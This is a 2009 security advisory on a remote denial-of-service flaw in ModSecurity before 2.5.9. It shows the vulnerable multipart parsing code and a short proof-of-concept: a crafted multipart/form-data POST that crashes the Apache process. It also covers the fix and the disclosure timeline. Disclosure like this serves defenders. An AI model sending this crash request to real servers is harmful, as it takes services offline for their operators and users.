[ISecAuditors Security Advisories] ModSecurity < 2.5.9 remote Denial of Service (DoS)
=============================================
INTERNET SECURITY AUDITORS ALERT 2009-001
- Original release date: February 25th, 2009
- Last revised: March 19th, 2009
- Discovered by: Juan Galiana Lara
- Severity: 7.8/10 (CVSS Base Scored)
=============================================
I. VULNERABILITY
-------------------------
ModSecurity < 2.5.9 is vulnerable to a remote Denial of Service (DoS)
II. BACKGROUND
-------------------------
ModSecurity is the most widely-deployed web application firewall in
the world, with more than 15,000 users. It runs as a Apache web server
module and is developed by Breach Security [ http://www.breach.com ],
it's avaliable with GNU GPL and many other comercial licenses.
III. DESCRIPTION
-------------------------
The multipart processor of modsecurity does not sanitize the user
supplied input sufficiently. Therefore, an attacker can send a crafted
post request of type multipart/form-data which will lead in a remote
denial of service.
The snippet of vulnerable code:
in file msc_multipart.c
1256 int multipart_get_arguments(modsec_rec *msr, char *origin,
apr_table_t *arguments) {
1257 multipart_part **parts;
1258 int i;
1259
1260 parts = (multipart_part **)msr->mpd->parts->elts;
1261 for(i = 0; i < msr->mpd->parts->nelts; i++) {
1262 if (parts[i]->type == MULTIPART_FORMDATA) {
1263 msc_arg *arg = (msc_arg *)apr_pcalloc(msr->mp,
sizeof(msc_arg));
1264 if (arg == NULL) return -1;
1265
1266 arg->name = parts[i]->name;
1267 arg->name_len = strlen(parts[i]->name);
On line 1267, due to the pointer parts[i]->name is not properly
sanitized the parameter of strlen function takes the value NULL,
getting a segmentation fault and resulting in a crash of the apache
process that handle the request.
IV. PROOF OF CONCEPT
-------------------------
The process could be crashed remotely by sending:
POST / HTTP/1.0
Content-Type: multipart/form-data;
boundary=---------------------------xxxxxxxxxxxxxx
Content-Length: 91
-----------------------------xxxxxxxxxxxxxx
:
-----------------------------xxxxxxxxxxxxxx--
In order to send a correct HTTP/1.1 request you must add a valid Host
header.
With the configuration directives:
SecAuditEngine On
SecDebugLogLevel 9
After the attack, the last line of the debug logfile is:
[25/Feb/2009:09:51:18 +0100] [vhost/sid#884348][rid#aaf0d8][/][9]
Multipart: Added part abe458 to the list: name "(null)" (offset 0,
length 0)
V. BUSINESS IMPACT
-------------------------
An attacker could cause a remote denial of service to an Apache
installation with modsecurity 2 module.
VI. SYSTEMS AFFECTED
-------------------------
ModSecurity between 2.5.5 and 2.5.8 are vulnerable, other versions may
be affected.
Tested with Apache httpd 2.2.11.
VII. SOLUTION
-------------------------
Upgrade to version 2.5.9 of ModSecurity. It can be downloaded from
http://modsecurity.org/download/
VIII. REFERENCES
-------------------------
http://www.modsecurity.org
http://www.isecauditors.com
IX. CREDITS
-------------------------
This vulnerability has been discovered
by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).
Thanks to Jordi Rubió Romero (jrubio (at) isecauditorts (dot) com).
X. REVISION HISTORY
-------------------------
February 25, 2009: Initial release
March 19, 2009: Revision.
XI. DISCLOSURE TIMELINE
-------------------------
Febraury 25, 2009: Vulnerability acquired by
Internet Security Auditors (www.isecauditors.com)
March 02, 2009: ModSecurity contacted.
March 02, 2009: Response about remediation plan.
March 11, 2009: Path released
March 19, 2009: Published.
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors, S.L. accepts no responsibility for any
damage caused by the use or misuse of this information.